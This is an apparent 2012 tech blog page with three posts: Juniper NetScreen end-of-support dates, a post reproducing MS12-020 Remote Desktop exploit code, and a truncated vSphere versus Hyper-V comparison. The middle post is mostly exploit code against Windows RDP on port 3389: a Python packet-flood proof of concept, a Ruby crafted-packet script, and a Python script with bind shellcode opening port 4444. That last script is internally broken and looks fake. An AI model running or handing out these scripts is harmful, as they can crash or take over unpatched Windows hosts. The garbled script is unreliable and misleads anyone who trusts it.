
Sunday, March 25, 2012

Juniper : NetScreen Security Products EOS Dates & Milestones

The following NetScreen Security products have all been announced as End of Life (EOL). The End of Support (EOS) milestone dates for the five (5) year support model are published below.

Product | EOL Announce Date | Last Order Date | Last Date to Convert Warranty | Same Day Support Discontinued | Next Day Support Discontinued | End of Support
SSG-20-SB-W-JP, SSG-20-SB-W-KR | 12/15/11 | 04/29/12 | 04/29/13 | 04/29/13 | 04/29/14 | 04/29/16
SSG-5-SB-MW-JP, SSG-5-SB-MW-KR, SSG-5-SB-MW-TW, SSG-5-SH-MW-KR, SSG-5-SH-MW-TW | 12/15/11 | 04/29/12 | 04/29/13 | 04/29/13 | 04/29/14 | 04/29/16
SSG-5-SB-BTW-JP, SSG-5-SB-BTW-KR, SSG-5-SB-BTW-TW, SSG-5-SH-BTW-KR, SSG-5-SH-BTW-TW | 12/15/11 | 04/29/12 | 04/29/13 | 04/29/13 | 04/29/14 | 04/29/16
SSG-5-20-PWR-S-J | 12/15/11 | 04/29/12 | 04/29/13 | 04/29/13 | 04/29/14 | 04/29/16
Enhanced Physical Interface Modules (EPIMs) | 11/30/09 | 05/31/10 | 05/31/11 | 05/31/12 | 05/31/14 | 05/31/15
NetScreen-5GT | 06/30/08 | 12/31/08 | 12/31/09 | 12/31/10 | 12/31/12 | 12/31/13
NetScreen-25, NetScreen-50 | 01/01/08 | 06/30/08 | 06/30/09 | 06/30/10 | 06/30/12 | 06/30/13
SSG 520M NEBS, SSG 550M NEBS | 01/01/08 | 06/30/08 | 06/30/09 | 06/30/10 | 06/30/12 | 06/30/13
SSG 520, SSG 550 (Non-M platforms) | 01/01/08 | 06/30/08 | 06/30/09 | 06/30/10 | 06/30/12 | 06/30/13

Any product being discontinued is announced as EOL up to one hundred eighty (180) days prior to the discontinuation and end-of-sale date, also referred to as the last order date. On the last order date, products are removed from the price list and are no longer available for purchase.

Support is provided only for products whose new-product warranty coverage is converted to a support services contract before the standard warranty expires, one (1) year after the last order date.

Same Day and Same Day Onsite support services are no longer available two (2) years after product last order date. The following J-Care services offerings are available: Core, CorePlus, Next Day and Next Day Onsite. Please refer to the Juniper published price list for details. The following JNASC service offerings are available: Basic, RTF, AR-5, AR-1, Next Day, and Next Day Onsite. Please refer to the JNASC price list for details.

Next Day and Next Day Onsite support services are no longer available four (4) years after product last order date. Additionally, four (4) years after product last order date is the last date that any support service offerings are available or renewable.

The product reaches End of Support five (5) years after the last order date. No support services contracts are available and the last contract will expire on the published EOS date.
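The milestone schedule above is simple date arithmetic from the last order date. Here is a minimal sketch of the general five (5) year model described in the text (the function name is mine; note that some product lines in the table, such as the SSG rows, run on a shorter schedule, so the published dates always take precedence):

```python
from datetime import date

def eos_milestones(last_order):
    """Derive support milestones from a product's last order date,
    following the general five (5) year model described above."""
    def add_years(d, n):
        # None of the published EOL dates fall on Feb 29, so a plain
        # year replacement is sufficient for this sketch.
        return d.replace(year=d.year + n)

    return {
        "last_order": last_order,
        "last_warranty_conversion": add_years(last_order, 1),  # convert warranty within 1 year
        "same_day_discontinued": add_years(last_order, 2),     # Same Day support ends after 2 years
        "next_day_discontinued": add_years(last_order, 4),     # Next Day support / last renewal after 4 years
        "end_of_support": add_years(last_order, 5),            # EOS 5 years after last order
    }

# EPIM row from the table: last order 05/31/10 -> EOS 05/31/15
m = eos_milestones(date(2010, 5, 31))
print(m["end_of_support"])  # 2015-05-31
```

The EPIM row matches this model exactly; verify any other product against the published table rather than the formula.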

NOTE: For products that reached end of life (EOL) prior to March 1, 2003, Juniper provides hardware support for up to three (3) years from the date the products are discontinued. For legacy products and products from companies acquired by Juniper Networks, the EOS milestones may vary.

Monday, March 19, 2012

PoC source code : Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)

This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system. By default, the Remote Desktop Protocol (RDP) is not enabled on any Windows operating system. Systems that do not have RDP enabled are not at risk.

This security update is rated Critical for all supported releases of Microsoft Windows.

Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually.
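Since systems without RDP enabled are not at risk, a quick way to check a machine's exposure is to see whether anything is listening on the default RDP port. A minimal sketch (the host string and timeout are placeholders, and an open port only indicates a listener, not necessarily a vulnerable one):

```python
import socket

def rdp_port_open(host, port=3389, timeout=2.0):
    """Return True if a TCP connection to the RDP port succeeds.
    A refused or filtered port usually means RDP is not exposed there."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Example: check the local machine (host is a placeholder)
print(rdp_port_open("127.0.0.1"))
```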

Windows Patch Release : http://technet.microsoft.com/en-us/security/bulletin/ms12-020

Source Code 1: China

#
# ms12-020 "chinese shit" PoC
#
# tested on winsp3 spanish, from localhost
#
#

import socket
import sys


buf=""
buf+="\x03\x00\x00\x13\x0e\xe0\x00\x00"
buf+="\x00\x00\x00\x01\x00\x08\x00\x00"
buf+="\x00\x00\x00\x03\x00\x01\xd6\x02"
buf+="\xf0\x80\x7f\x65\x82\x01\x94\x04"
buf+="\x01\x01\x04\x01\x01\x01\x01\xff"
buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
buf+="\xc0\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x04\x01\x00\x01\x00\x03\x00\x00"
buf+="\x08\x02\xf0\x80\x28\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xef\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x38\x00\x06\x03\xeb\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xec\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x38\x00\x06\x03\xed\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xee\x03\x00\x00\x0b\x06\xd0\x00"
buf+="\x00\x12\x34\x00"

HOST = sys.argv[1]
PORT = 3389
for i in range(1000):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    print "sending: %d bytes" % len(buf)
    s.send(buf)
    rec = s.recv(100)
    print "received: %d bytes" % len(rec)
    s.close()
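For reference, the buffer above opens with a TPKT header (RFC 1006) followed by an X.224 connection request, which is what makes it a valid first RDP packet. A small sketch decoding those opening bytes (the byte values are copied from the buffer above):

```python
import struct

# First six bytes of the PoC buffer: TPKT header + start of the X.224 TPDU
head = b"\x03\x00\x00\x13\x0e\xe0"

# TPKT: version (1 byte), reserved (1 byte), big-endian total length (2 bytes)
version, reserved, tpkt_len = struct.unpack(">BBH", head[:4])
# X.224: length indicator, then the TPDU code
x224_len, x224_code = head[4], head[5]

print(version)         # 3: TPKT version
print(tpkt_len)        # 19: total length of this TPKT, header included
print(hex(x224_code))  # 0xe0: X.224 Connection Request
```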

Source Code 2 : Python

#!/usr/bin/env python
#############################################################################
# MS12-020 Exploit by Sabu
# sabu@fbi.gov
# Uses FreeRDP
#############################################################################

import struct
import sys
from threading import Thread
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import rdpNego

#bind shellcode TCP port 4444
shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'


#Payload
payload = '\x41\x00\x5c\x00'
payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68'


class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port = port
        self.target = target

    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
        self.__trans.connect()
        print '[-]Connected to %s' % self.target

        # Build the packet
        self.__stub = '\x01\x00\x00\x00'
        self.__stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub += shellcode
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x00\x00\x00\x00'
        self.__stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub += payload
        self.__stub += '\x00\x00\x00\x00'
        self.__stub += '\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub += '\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub += '\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub += '\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successful!...\nTelnet to port 4444 on target machine.'


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print '\nUsage: %s <target>\n' % sys.argv[0]
        sys.exit(-1)

    target = sys.argv[1]
    current = SRVSVC_Exploit(target)
    current.start()

Source Code 3 : Ruby

#!/usr/bin/env ruby

#
# ms12-020 PoC attempt
#
# NOTE: This was crafted based on a legit connection packet capture and reversing
# a packet capture of the leaked MAPP PoC.
#
# by Joshua J. Drake (jduck)
#

require 'socket'

def send_tpkt(sd, data)
  sd.write(make_tpkt(data))
end

def make_tpkt(data)
  [
    3,              # version
    0,              # reserved
    4 + data.length # length (includes this 4-byte header)
  ].pack('CCn') + data
end

def make_x224(data)
  [ data.length ].pack('C') + data
end

def make_rdp(type, flags, data)
  [ type, flags, 4 + data.length ].pack('CCv') + data
end


host = ARGV.shift

sd = TCPSocket.new(host, 3389)
pkts1 = []

# craft connection request
rdp = make_rdp(1, 0, [ 0 ].pack('V'))
x224_1 = make_x224([
  0xe0, # Connection request
  0,    # DST-REF
  0,    # SRC-REF
  0     # Class : Class 0
].pack('CnnC') + rdp)

pkts1 << make_tpkt(x224_1)


# craft connect-initial
x224_2 = make_x224([
  0xf0, # Data / Class 0
  0x80  # EOT: True / NR: 0
].pack('CC'))

# mcsCi
target_params = ""+
#"\x02\x01\x00"+ # maxChannelIds
"\x02\x01\x22"+ # maxChannelIds
"\x02\x01\x0a"+ # maxUserIds
"\x02\x01\x00"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\xff\xff"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion
min_params = ""+
"\x02\x01\x01"+ # maxChannelIds
"\x02\x01\x01"+ # maxUserIds
"\x02\x01\x01"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\x04\x20"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion
max_params = ""+
"\x02\x02\xff\xff"+ # maxChannelIds
"\x02\x02\xfc\x17"+ # maxUserIds
"\x02\x02\xff\xff"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\xff\xff"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion

userdata = ""+
# gccCCrq
"\x00\x05\x00\x14"+
"\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+
# clientCoreData
"\x01\xc0"+"\xd8\x00"+ # header (type, len)
"\x04\x00"+"\x08\x00"+ # version
"\x80\x02"+ # desktop width
"\xe0\x01"+ # desktop height
"\x01\xca"+ # color depth
"\x03\xaa"+ # SASSequence
"\x09\x04\x00\x00" + # keyboard layout
"\xce\x0e\x00\x00" + # client build number
# client name
"\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x04\x00\x00\x00"+ # keyboard type
"\x00\x00\x00\x00"+ # kbd subType
"\x0c\x00\x00\x00"+ # kbd FuncKey
# imeFileName
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x01\xca"+ # postBeta2ColorDepth
"\x01\x00"+ # clientProductId
"\x00\x00\x00\x00" + # serialNumber
"\x10\x00"+ # highColorDepth
"\x07\x00"+ # supportedColorDepths
"\x01\x00"+ # earlyCapabilityFlags
# clientDigProductId -poc has: "00000-000-0000000-00000"
"\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"+ # connectionType
"\x00"+ # pad1octet
"\x00\x00\x00\x00"+ # serverSelectedProtocol
"\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
"\x0d\x00\x00\x00"+ # desktopPhysicalHeight
"\x00\x00\x00\x00"+ # reserved
# clientSecurityData
"\x02\xc0"+"\x0c\x00"+ # header (type, len)
"\x1b\x00\x00\x00"+ # encryptionMethods
"\x00\x00\x00\x00"+ # extEncryptionMethods
# clientNetworkData
"\x03\xc0"+"\x2c\x00"+ # header (type, len)
"\x03\x00\x00\x00"+ # channel count!
# channel 0
"rdpdr\x00\x00\x00"+ # name
"\x00\x00\x80\x80"+ # options
# channel 1
"cliprdr\x00"+ # name
"\x00\x00\xa0\xc0"+ # options
# channel 2
"rdpsnd\x00\x00"+ # name
"\x00\x00\x00\xc0" # options
# clientClusterData (not present)
# clientMonitorData (not present)

mcs_data = ""+
"\x04\x01\x01"+ # callingDomainSelector
"\x04\x01\x01"+ # calledDomainSelector
"\x01\x01\xff"+ # upwardFlag
"\x30" + [ target_params.length ].pack('C') + target_params +
"\x30" + [ min_params.length ].pack('C') + min_params +
"\x30" + [ max_params.length ].pack('C') + max_params +
# userData
"\x04\x82" + [ userdata.length ].pack('n') + userdata

mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n') # connect-initial (0x65 / 101), length
mcs << mcs_data

pkts1 << make_tpkt(x224_2 + mcs)


# send a special one?
#pkts1 << make_tpkt(x224_2 + "\x04\x01\x00\x01\x00")

# send more pkts! - based on poc
8.times {
  pkts1 << make_tpkt(x224_2 + "\x28")
}

#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xea")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xeb")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xec")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xed")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xee")
pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf0")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf1")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf2")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf3")

pkts1 << make_tpkt(x224_2 + "\x21\x80")

bigpkt = pkts1.join('')

20.times { |x|
  puts "[*] Sending #{x + 1} ..."
  sd.write(bigpkt)

  send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")
  #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
  #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x03")
  #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")

  # read connect-initial response
  buf = sd.recv(1500)
  # XXX: TODO: check response =)
  #puts buf
}

sd.close

Sunday, March 18, 2012

VMware vSphere 5 vs Microsoft Hyper-V 3.0

This article gives an overview of the features of Hyper-V 3.0, part of Microsoft Windows Server 8, and compares them with the features of the VMware vSphere 5.0 Enterprise edition.

Microsoft Hyper-V 3.0 promises to offer a lot of new features.

‘The upcoming Hyper-V 3.0 release that’s included in the next version of Windows Server has closed the technology gap with VMware’s vSphere’

We all know Microsoft is very good at marketing, and we also (should) know that Hyper-V 2.0 currently lags far behind vSphere 5 in features, scalability and enterprise readiness. Until Windows Server 8 is generally available (GA), we will not know for sure which advertised features will make it into the GA version.

Public and private clouds are in my opinion the IT of the future. Microsoft and VMware both have solutions which enable a cloud computing infrastructure.

Below I research the new features of Hyper-V 3.0 and compare them to the feature set of vSphere 5.

The image below shows the features of the VMware vSphere 5 Enterprise Plus edition compared to Hyper-V 3.0, as far as I could find out using documentation on the internet.
To show the progress Microsoft has made, I also list the current features of Hyper-V 2.0.

The information on features is based on the Windows Server 8 beta, which was released on February 29. Some features in the beta are enhanced compared to the Developer Preview build:

  • 1 TB of memory on a virtual machine (up from 512 GB in the Windows Server “8” Developer Preview Build)
  • 64 TB of virtual disk size (up from 16 TB in the Windows Server “8” Developer Preview Build)

Features and license costs are quite easy to compare. But there is more to consider when selecting which solution best fits the demands and budget. This posting provides an overview of several aspects: performance, eco-system, reliability, and guest support.

Cost of licensing
There is always a lot of focus on costs. Costs have two aspects: the cost of buying something (CAPEX) and the cost of operating it (OPEX).


It is pretty clear that Hyper-V is, and will remain, cheaper than vSphere. Mind that the vSphere Essentials Plus edition combined with offers from Veeam is competitive with Hyper-V in cases where no more than three hosts are needed.


While comparing CAPEX is pretty easy, comparing OPEX is difficult. How can you tell whether managing a Hyper-V environment will cost more or less effort (= time) than managing a vSphere environment?

However, given the big price difference and the growing feature set of Hyper-V 3.0, it will become more difficult to convince your boss to choose vSphere over ’free’ Hyper-V.
Large enterprises (which have all been using server virtualization for some time) will not rapidly switch to Hyper-V.

Performance
Several benchmarks do not show a significant performance difference between Hyper-V and vSphere.

Eco-system
